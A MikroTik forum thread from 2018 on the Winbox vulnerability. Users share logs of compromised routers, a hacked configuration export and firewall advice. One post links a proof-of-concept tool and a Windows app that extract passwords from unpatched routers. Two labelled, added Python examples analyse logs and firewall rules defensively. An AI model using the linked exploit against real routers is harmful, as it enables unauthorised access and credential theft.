mrz
MikroTik Support
Posts: 5659
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 3:18 pm

unless they have a time machine (and you guys don't, right?).
We are working on it.
 
mkx
Long time Member
Posts: 643
Joined: Thu Mar 03, 2016 10:23 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 4:27 pm

6 year old default firewall rules aren't secure enough? What do you expect MikroTik to do about that now?
MikroTik already updated the default firewall rules more than a year ago.
They can't change how they made stuff 6 years ago unless they have a time machine (and you guys don't, right?).

If you want the newer default firewall rules, you just take a spare router, upgrade it to the latest RouterOS version, reset the configuration to default, and then you just copy the firewall rules from it onto your older routers.
You can also reset your router to the newer default configuration and then build a new configuration up around that.
Or even better, read the manual about how to secure your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
@Deantwo: you largely misinterpreted what I wrote in my post.

The biggest problem with recent (well, in the last two years or so) vulnerabilities in ROS is that old default settings did not rigorously close all WAN access to RB. And then most users (apart from a small number of professionals, and not even all professionals) don't upgrade ROS regularly. And even if they do, they expect that this is enough, but now we know that old FW rules are not good enough. The vast majority of users (quite a few "professionals" included) are too ignorant to grasp the need for constantly improving their setup (don't fix it if it ain't broken). Most home users don't have a spare RB (of exactly the same type, to make the transition bearable) so that they can reset the config, configure from scratch and put it in production.

It just doesn't work for the crowd, the same crowd that will probably never upgrade ROS anyway, and because of the same crowd articles about massively compromised routerboards will pop up in the press for quite some time to come ...
BR,
Metod
 
normis
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 4:47 pm

ROS is that old default settings
That is not correct. Since beginning of default firewall, it protects the default wan port. The issue is that some people want to make VPN in their home router, so they turn off the firewall.
No answer to your question? How to write posts
 
sid5632
Member Candidate
Posts: 252
Joined: Fri Feb 17, 2017 6:05 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 4:49 pm

unless they have a time machine (and you guys don't, right?).
We are working on it.
Yeah, but when will it be released?
1985?
 
mrz
MikroTik Support
Posts: 5659
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 4:50 pm

Actually old firewall protected router just fine. Users ef-ed up configuration and did not adjust firewall accordingly.
Of course we will think about improvements, but there will always be the case when somebody changes something and complains that the router is not secure.
 
Deantwo
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 6:08 pm

Actually old firewall protected router just fine. Users ef-ed up configuration and did not adjust firewall accordingly.
Of course we will think about improvements, but there will always be the case when somebody changes something and complains that the router is not secure.
Yeah, if a guide starts by saying "remove the default configuration", you likely need to rethink your choice of configuration guide.

The manual's guide on securing your router taught me a thing or two as well. Very useful.
See: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
I wish my FTP was FTL.
 
schadom
Frequent Visitor
Posts: 69
Joined: Sun Jun 25, 2017 2:47 am
Location: Austria

Re: Winbox vulnerability: please upgrade

Fri Sep 07, 2018 1:37 am

Actually old firewall protected router just fine. Users ef-ed up configuration and did not adjust firewall accordingly.
Of course we will think about improvements, but there will always be the case when somebody changes something and complains that the router is not secure.

Thanks mrz for all your efforts in making the web more secure.
Here are some suggestions in unsorted order:

- Secure hashing of passwords in .idx files (scrypt, bcrypt, pbkdf2 or at least sha-3)
- Password complexity requirements setting which is enabled and enforced by default
- Warning messages and double-confirmations for enabling access from 0.0.0.0/0
- Bruteforce prevention & temporary lockout for all management ports by default
- Notifications in Winbox or on Winbox startup for critical security updates
- A security announcement mailinglist would be very useful
- Automatic security updates (manual opt-in for SoHo devices)
 
macgaiver
Forum Guru
Posts: 1677
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: Winbox vulnerability: please upgrade

Fri Sep 07, 2018 8:41 am

I just recently remembered that I gave an MT router to my far relatives. I pre-configured it with just Winbox access; it was a year ago. I just got the IP to connect to, and this is what I see:
Jul/28/2018 08:12:46 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Jul/28/2018 08:12:46 system,info socks config changed by macgaiver
Jul/28/2018 08:12:47 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
Jul/28/2018 08:13:17 system,info script removed from scheduler by macgaiver
Jul/28/2018 08:13:17 system,info script removed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info script removed from scheduler by macgaiver
Jul/28/2018 08:13:17 system,info script removed by macgaiver

Aug/05/2018 11:31:15 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Aug/05/2018 11:31:16 system,info socks acl entry added by macgaiver
Aug/05/2018 11:31:16 system,info socks config changed by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver

Aug/19/2018 23:22:47 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Aug/19/2018 23:22:47 system,info socks acl entry added by macgaiver
Aug/19/2018 23:22:47 system,info socks config changed by macgaiver
Aug/19/2018 23:22:47 system,info new script added by macgaiver
Aug/19/2018 23:22:47 system,info new script scheduled by macgaiver
Aug/19/2018 23:22:47 system,info new script added by macgaiver
Aug/19/2018 23:22:47 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
Aug/19/2018 23:22:47 system,info new script scheduled by macgaiver
Aug/19/2018 23:23:17 system,info script removed from scheduler by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info script removed by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info script removed from scheduler by macgaiver
Aug/19/2018 23:23:17 system,info script removed by macgaiver

Sep/03/2018 23:03:03 system,info,account user macgaiver logged in from 109.172.76.49 via winbox
Sep/03/2018 23:03:07 system,info,account user macgaiver logged in from 109.172.76.49 via telnet
Sep/03/2018 23:03:11 system,info ip service changed by macgaiver
Sep/03/2018 23:03:13 system,info ip service changed by macgaiver
Sep/03/2018 23:03:14 system,info,account user macgaiver logged out from 109.172.76.49 via winbox
Sep/03/2018 23:03:14 system,info,account user macgaiver logged out from 109.172.76.49 via telnet
Sep/03/2018 23:03:16 system,info,account user macgaiver logged in from 159.224.52.96 via api
Sep/03/2018 23:03:20 system,info socks config changed by macgaiver
Sep/03/2018 23:03:21 system,info dns changed by macgaiver
Sep/03/2018 23:03:21 system,info item changed by macgaiver
Sep/03/2018 23:03:23 system,info script removed by macgaiver
Sep/03/2018 23:03:24 system,info script removed from scheduler by macgaiver
Sep/03/2018 23:03:25 system,info socks config changed by macgaiver
Sep/03/2018 23:03:26 system,info http proxy settings changed by macgaiver
Sep/03/2018 23:03:37 wireless,info 60:A4:D0:05:67:CB@wlan1: disconnected, disabling
Sep/03/2018 23:03:37 system,info,account user macgaiver logged out from 159.224.52.96 via api
Sep/03/2018 23:03:37 system,info,account user macgaiver logged out from 159.224.52.96 via api
Sep/03/2018 23:03:43 system,info verified routeros-mipsbe-6.42.7.npk
Sep/03/2018 23:03:43 system,info installed routeros-mipsbe-6.42.7
Sep/03/2018 23:03:44 system,info router rebooted

None of them was me :), including the last one that cleared everything up and upgraded the router (thanks to whomever that was).
With great knowledge comes great responsibility, because of ability to recognize id... incompetent people much faster.
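
The pattern visible in the log above (a login followed within seconds by socks, script/scheduler and firewall changes) can be searched for across collected router logs. The following is an added example, not part of the original post; the sample lines are constructed in the same format with documentation addresses, and the 60-second window and two-category threshold are assumptions to tune.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the log format shown in the post above
# (documentation addresses and MAC, placeholder user "admin").
SAMPLE_LOG = """\
Jul/28/2018 08:12:46 system,info,account user admin logged in from 203.0.113.10 via winbox
Jul/28/2018 08:12:46 system,info socks config changed by admin
Jul/28/2018 08:12:47 system,info new script added by admin
Jul/28/2018 08:12:48 system,info new script scheduled by admin
Jul/28/2018 08:12:48 system,info,account user admin logged out from 203.0.113.10 via winbox
Jul/28/2018 08:13:17 system,info filter rule changed by admin
Jul/28/2018 08:13:17 system,info script removed by admin
Aug/02/2018 19:40:03 system,info,account user admin logged in from 192.0.2.44 via winbox
Aug/02/2018 19:40:30 system,info dns changed by admin
Aug/02/2018 19:55:12 system,info,account user admin logged out from 192.0.2.44 via winbox
Aug/02/2018 20:01:00 wireless,info 00:00:5E:00:53:01@wlan1: disconnected, disabling
"""

LINE_RE = re.compile(r"^(\w{3}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}) (\S+) (.*)$")
LOGIN_RE = re.compile(r"^user (\S+) logged in from (\S+) via (\S+)$")
CHANGE_RE = re.compile(r"^(.+) by (\S+)$")

# Keyword -> category of configuration change, checked in this order.
CATEGORIES = [
    ("socks", "socks"),
    ("script", "script/scheduler"),
    ("filter rule", "firewall"),
    ("ip service", "services"),
    ("http proxy", "proxy"),
    ("dns", "dns"),
]


def classify(action):
    """Map a log action such as 'new script scheduled' to a category."""
    for keyword, category in CATEGORIES:
        if keyword in action:
            return category
    return None


def parse_log(text):
    """Return (timestamp, kind, user, detail) tuples for logins and changes."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%b/%d/%Y %H:%M:%S")
        topics, msg = m.group(2).split(","), m.group(3)
        login = LOGIN_RE.match(msg)
        if "account" in topics and login:
            user, ip, service = login.groups()
            events.append((ts, "login", user, f"{ip} via {service}"))
            continue
        change = CHANGE_RE.match(msg)
        if change and classify(change.group(1)):
            events.append((ts, "change", change.group(2), classify(change.group(1))))
    return events


def find_suspicious_sessions(events, window=60, min_categories=2):
    """Group each user's changes made within `window` seconds of a login.

    Changes are matched by time rather than by logout, because in the posted
    log the scheduled clean-up runs about 30 s after the session has ended.
    A group touching at least `min_categories` kinds of configuration is
    reported; a busy human admin can trip this too, so treat it as a lead.
    """
    limit = timedelta(seconds=window)
    open_sessions, closed = {}, []
    for ts, kind, user, detail in sorted(events, key=lambda e: e[0]):
        session = open_sessions.get(user)
        if session and ts - session["last_login"] > limit:
            closed.append(open_sessions.pop(user))
            session = None
        if kind == "login":
            if session is None:
                session = open_sessions[user] = {
                    "user": user, "start": ts, "last_login": ts,
                    "sources": [], "categories": set(), "changes": 0,
                }
            session["last_login"] = ts
            if detail not in session["sources"]:
                session["sources"].append(detail)
        elif session is not None:
            session["categories"].add(detail)
            session["changes"] += 1
    closed.extend(open_sessions.values())
    return [
        {**s, "categories": sorted(s["categories"])}
        for s in closed if len(s["categories"]) >= min_categories
    ]


if __name__ == "__main__":
    for hit in find_suspicious_sessions(parse_log(SAMPLE_LOG)):
        print(hit["start"], hit["user"], hit["sources"], hit["categories"])
```
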
 
msatter
Forum Veteran
Posts: 875
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Sep 10, 2018 1:01 pm

Our Dutch Prime Minister has also a driver license made in Poland on his name.

Darn the advertisement is removed.
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.43 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
BartoszP
Forum Guru
Posts: 1585
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Mon Sep 10, 2018 1:13 pm

@msatter: Is it a joke or not?
Real admins use real keyboards.
 
wpeople
Member
Posts: 343
Joined: Sat May 26, 2007 6:36 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 10, 2018 6:47 pm

May I ask, how is it possible for an attacker to load up the known scripts and modify firewall, socks proxy, etc.
if in IP/Services only winbox and ssh are allowed, but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
 
43north
Member Candidate
Posts: 191
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Mon Sep 10, 2018 9:06 pm

May I ask, how is it possible for an attacker to load up the known scripts and modify firewall, socks proxy, etc.
if in IP/Services only winbox and ssh are allowed, but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
I have understood that even if you limit the connections in the IP/Services to specific addresses that it still allows the attacker close enough to execute the exploit. I have created firewall rules for the default 8291 and also for the port that I changed my Winbox access to. This is the only sure way in my mind that they won't be able to even reach IP/Services.

Anyone please correct me if I am wrong on these points.
 
msatter
Forum Veteran
Posts: 875
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Sep 10, 2018 9:11 pm

@msatter: Is it a joke or not?
https://www.rdw.nl/particulier/nieuws/2 ... -rijbewijs

The internet is full of news items about Rutte rijbewijs
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.43 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
Deantwo
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 10:08 am

May I ask, how is it possible for an attacker to load up the known scripts and modify firewall, socks proxy, etc.
if in IP/Services only winbox and ssh are allowed, but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possible.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.
I wish my FTP was FTL.
 
wpeople
Member
Posts: 343
Joined: Sat May 26, 2007 6:36 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 12:08 pm

May I ask, how is it possible for an attacker to load up the known scripts and modify firewall, socks proxy, etc.
if in IP/Services only winbox and ssh are allowed, but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possible.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.
Even if he knows the password BUT the service is LIMITED to my IP prefixes, how the hell can he control my device?!
The only way this is possible is if MikroTik made the service check the connecting IP address AFTER authentication.

If the service does NOT allow connections from anything but the listed IPs, the packets from an unlisted source should not access the application. I think.
Please fixme, or accept that there is another piece of sh!t found in the pancake...
 
normis
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 1:20 pm

Did you always have the IP SERVICES limitation? The hack could have happened last year. Is it correctly set up, and was it always?
No answer to your question? How to write posts
 
wpeople
Member
Posts: 343
Joined: Sat May 26, 2007 6:36 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 1:27 pm

Yes! 95% of those routers had the IP/Services limitation since installation! (The other 5% is customer radio turned into router from bridge, due to a customer router issue.)

90% of those 95% of devices have remote syslog as well, but at the moment I have had no time to look them up. Probably I will find something, because the hacker set the logging limit to 1 line :-)
 
normis
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 1:30 pm

How about possibility of a staff member, that used the attack script from the allowed IP range?
IP services works well, there is zero evidence that this limit can be overcome in some way.
No answer to your question? How to write posts
 
Deantwo
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 2:36 pm

May I ask, how is it possible for an attacker to load up the known scripts and modify firewall, socks proxy, etc.
if in IP/Services only winbox and ssh are allowed, but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possible.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.
Even if he knows the password BUT the service is LIMITED to my IP prefixes, how the hell can he control my device?!
The only way this is possible is if MikroTik made the service check the connecting IP address AFTER authentication.

If the service does NOT allow connections from anything but the listed IPs, the packets from an unlisted source should not access the application. I think.
Please fixme, or accept that there is another piece of sh!t found in the pancake...
Check your logs to see where the attacker accessed from, it could be a compromised machine from a trusted IP-address range. We can't really help you here without more information.

Maybe better if you make a new thread and post your configuration (passwords and IPs obscured of course) so we can see what might be wrong and help you there. Instead of polluting this thread with baseless accusations and misinformation.

I would however suggest to email support@mikrotik.com, since if it is a real issue then they can escalate it to the right department. This would however not satisfy my curiosity.
I wish my FTP was FTL.
 
macgaiver
Forum Guru
Posts: 1677
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 2:45 pm

In some cases it was reported that a device got infected from another infected device on the same (trusted) network.
With great knowledge comes great responsibility, because of ability to recognize id... incompetent people much faster.
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 6:09 pm

CHR was hacked. I got new password from disk image and password recovery tools.
Now I change hacker's configuration, remove socks, change password again, but didn't clear disk image and license.

See screenshot of winbox interface : http://prntscr.com/kt6f9y


1. What is this "job" in the image? Is it a hacker's job, or system (like osfp)?
There is no such task in my usual configuration.

here is full export command (little obfuscated)
/export
# sep/11/2018 17:50:21 by RouterOS 6.43
# software id =
#
#
#
/interface gre
add !keepalive local-address=185.31.1.2 name=to_S remote-address=46.0.1.1
add !keepalive local-address=185.31.1.2 name=to_X remote-address=178.215.1.1
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/routing ospf instance
set [ find default=yes ] router-id=192.168.123.0
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0 name=public4444
/ip address
add address=185.31.1.2/24 interface=ether1 network=185.31.1.0
add address=192.168.123.254/24 interface=ether2 network=192.168.123.0
add address=10.10.10.26/30 interface=to_Xl network=10.10.10.24
add address=20.20.20.1/30 interface=to_Y network=20.20.20.0
/ip dhcp-client
add disabled=no interface=ether1
/ip dns
set allow-remote-requests=yes servers=8.8.8.8
/ip firewall filter
add action=fasttrack-connection chain=forward connection-state=established,related
add action=accept chain=forward connection-state=established,related
add action=accept chain=input connection-state=established,related
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=udp
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=netmap chain=dstnat comment="HTTPS Nginx" dst-port=443 in-interface=ether1 protocol=tcp to-addresses=192.168.123.1 to-ports=443
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set h323 disabled=yes
set sip disabled=yes
set udplite disabled=yes
set dccp disabled=yes
set sctp disabled=yes
/ip route
add distance=1 gateway=185.31.1.1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh port=2001
set api disabled=yes
set api-ssl disabled=yes
/routing ospf network
add area=backbone network=10.10.10.24/30
add area=backbone network=192.168.123.0/24
add area=backbone network=20.20.20.0/30
/system clock
set time-zone-name=Europe/Moscow
/system ntp client
set enabled=yes primary-ntp=216.229.0.179 secondary-ntp=80.240.216.155
Can hackers also put backdoors to linux?

2. How can I reinstall CHR license on new disk image?
 
Deantwo
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 8:06 pm

here is full export command (little obfuscated)
/export
# sep/11/2018 17:50:21 by RouterOS 6.43
# software id =
#
#
#
/interface gre
add !keepalive local-address=185.31.1.2 name=to_S remote-address=46.0.1.1
add !keepalive local-address=185.31.1.2 name=to_X remote-address=178.215.1.1
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/routing ospf instance
set [ find default=yes ] router-id=192.168.123.0
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0 name=public4444
/ip address
add address=185.31.1.2/24 interface=ether1 network=185.31.1.0
add address=192.168.123.254/24 interface=ether2 network=192.168.123.0
add address=10.10.10.26/30 interface=to_Xl network=10.10.10.24
add address=20.20.20.1/30 interface=to_Y network=20.20.20.0
/ip dhcp-client
add disabled=no interface=ether1
/ip dns
set allow-remote-requests=yes servers=8.8.8.8
/ip firewall filter
add action=fasttrack-connection chain=forward connection-state=established,related
add action=accept chain=forward connection-state=established,related
add action=accept chain=input connection-state=established,related
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=udp
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=netmap chain=dstnat comment="HTTPS Nginx" dst-port=443 in-interface=ether1 protocol=tcp to-addresses=192.168.123.1 to-ports=443
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set h323 disabled=yes
set sip disabled=yes
set udplite disabled=yes
set dccp disabled=yes
set sctp disabled=yes
/ip route
add distance=1 gateway=185.31.1.1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh port=2001
set api disabled=yes
set api-ssl disabled=yes
/routing ospf network
add area=backbone network=10.10.10.24/30
add area=backbone network=192.168.123.0/24
add area=backbone network=20.20.20.0/30
/system clock
set time-zone-name=Europe/Moscow
/system ntp client
set enabled=yes primary-ntp=216.229.0.179 secondary-ntp=80.240.216.155
Yeah, that configuration is not secure. Wide open to the internet and attackers.
At least missing a couple block rules in the firewall filter. For example:
/ip firewall filter
add action=accept chain=forward in-interface=ether1 connection-state=established,related
add action=accept chain=input in-interface=ether1 connection-state=established,related
add action=drop chain=forward in-interface=ether1
add action=drop chain=input in-interface=ether1
But suggest you read the manual page about securing your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
Can hackers also put backdoors to linux?
No they can not access the linux operating system of the router, unless you have rooted the router yourself already. Which you really should not do.
Unless you were running a version of RouterOS that is older than v6.38.5, see: viewtopic.php?f=21&t=132499
2. How can I reinstall CHR license on new disk image?
I suggest you email support@mikrotik.com with your license issue.
I wish my FTP was FTL.
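
Why the posted filter leaves management ports reachable, and what the suggested drop rules change, can be checked by walking the input chain in order for a new connection arriving on the WAN interface. The following is an added example, not part of the original posts or MikroTik code; the rule text is excerpted from the export and the reply above, and the evaluator models only the matchers that appear there (no negation, address lists or wrapped export lines).

```python
import shlex

# Excerpted from the export posted in the thread.
POSTED_FILTER = """\
/ip firewall filter
add action=fasttrack-connection chain=forward connection-state=established,related
add action=accept chain=forward connection-state=established,related
add action=accept chain=input connection-state=established,related
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=udp
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
"""

# Excerpted from the reply; "add" without a position appends after the rules above.
SUGGESTED_RULES = """\
/ip firewall filter
add action=accept chain=forward in-interface=ether1 connection-state=established,related
add action=accept chain=input in-interface=ether1 connection-state=established,related
add action=drop chain=forward in-interface=ether1
add action=drop chain=input in-interface=ether1
"""

TERMINATING = {"accept", "drop", "reject", "tarpit"}
MATCH_KEYS = {"chain", "in-interface", "protocol", "dst-port", "connection-state"}
NON_MATCH_KEYS = {"action", "comment", "disabled"}


def parse_filter_rules(export_text):
    """Return the '/ip firewall filter' rules of an export, in order, as dicts."""
    rules, section = [], None
    for line in export_text.splitlines():
        line = line.strip()
        if line.startswith("/"):
            section = line
        elif section == "/ip firewall filter" and line.startswith("add "):
            tokens = shlex.split(line)[1:]
            rules.append(dict(t.split("=", 1) for t in tokens if "=" in t))
    return rules


def port_in_spec(port, spec):
    """True if port is in a dst-port value such as '53' or '80,8000-8100'."""
    for part in spec.split(","):
        low, _, high = part.partition("-")
        if int(low) <= port <= int(high or low):
            return True
    return False


def rule_matches(rule, pkt):
    for key, want in rule.items():
        if key in NON_MATCH_KEYS:
            continue
        if key not in MATCH_KEYS:
            raise ValueError(f"matcher not modelled in this example: {key}")
        if key == "dst-port":
            ok = port_in_spec(pkt["dst-port"], want)
        elif key == "connection-state":
            ok = pkt["connection-state"] in want.split(",")
        else:
            ok = pkt[key] == want
        if not ok:
            return False
    return True


def verdict(rules, pkt):
    """First terminating rule that matches wins; no match means accept."""
    for rule in rules:
        if rule.get("chain") != pkt["chain"] or rule.get("disabled") == "yes":
            continue
        action = rule.get("action", "accept")
        if rule_matches(rule, pkt) and action in TERMINATING:
            return action
    return "accept"  # a built-in chain accepts packets that no rule matched


def exposed_tcp_ports(export_text, wan, ports):
    """Ports on which a new TCP connection from `wan` reaches the router itself."""
    rules = parse_filter_rules(export_text)
    exposed = []
    for port in ports:
        pkt = {"chain": "input", "in-interface": wan, "protocol": "tcp",
               "dst-port": port, "connection-state": "new"}
        if verdict(rules, pkt) == "accept":
            exposed.append(port)
    return exposed


if __name__ == "__main__":
    ports = [8291, 2001]  # default Winbox port and the ssh port set in the export
    print("as posted:      ", exposed_tcp_ports(POSTED_FILTER, "ether1", ports))
    print("with drop rules:", exposed_tcp_ports(POSTED_FILTER + SUGGESTED_RULES, "ether1", ports))
```
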
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 10:16 pm

Yeah, that configuration is not secure. Wide open to the internet and attackers.
Yes. And this is fine. Everyone has his own vision of comfort and safety.
What about my question? who starts this job?
2. How can I reinstall CHR license on new disk image?

I suggest you email support@mikrotik.com with your license issue.
I haven't access to email or account. Only disk image with self-updated license.
Any other suggestion?
 
Deantwo
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 11:01 pm

2. How can I reinstall CHR license on new disk image?
I suggest you email support@mikrotik.com with your license issue.
I haven't access to email or account. Only disk image with self-updated license.
Any other suggestion?
Email support@mikrotik.com, they can help you with all your questions.
I wish my FTP was FTL.
 
djradiator
just joined
Posts: 5
Joined: Mon Mar 22, 2010 7:10 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 11:20 pm

Hello everybody,

If somebody will need, I just created a Windows App for showing passwords for impacted MK versions based on the original Python script (https://github.com/BasuCert/WinboxPoC):
https://github.com/msterusky/WinboxExploit/releases

It's a one-time application, and don't plan any extensions and next versions.
The app doesn't contain an implementation with mac-winbox, and works only on IP layer.

Please, feel free to reuse it or adjust as you need.


Thanks,
Martin
 
sid5632
Member Candidate
Posts: 252
Joined: Fri Feb 17, 2017 6:05 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 1:37 am

Yeah, that configuration is not secure. Wide open to the internet and attackers.
Yes. And this is fine. Everyone has his own vision of comfort and safety.
You got hacked and started asking questions. Then when someone gives you a sensible answer and tells you where you went wrong, you disagree with them and stick your head in the sand.
You ARE a fool.
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 9:36 am


You ARE a fool.
If this is a reasonable answer, then I invite you to go to Western Siberia in the winter to restore access to the router.


Just answer me, what kind of job is running on this configuration?
 
normis
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 9:40 am

Let me understand this.

1. You have an open router with no firewall
2. You ask why somebody connected to it

Correct?
No answer to your question? How to write posts
 
Deantwo
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:03 am

If this is a reasonable answer, then I invite you to go to Western Siberia in the winter to restore access to the router.
Even better reason to have it secure, and a plan for how to access it remotely when you finally do secure it correctly.
The manual page I linked you to has examples on how to do all of that. I urge you to give it a read if you haven't already, but even so reading it again is a good idea. I might need to read it all again myself.
Just answer me, what kind of job is running on this configuration?
From the picture and config you supplied us, we can't tell you.
That is why I told you to email support@mikrotik.com instead. Maybe they can see what it is doing if you make a supout?

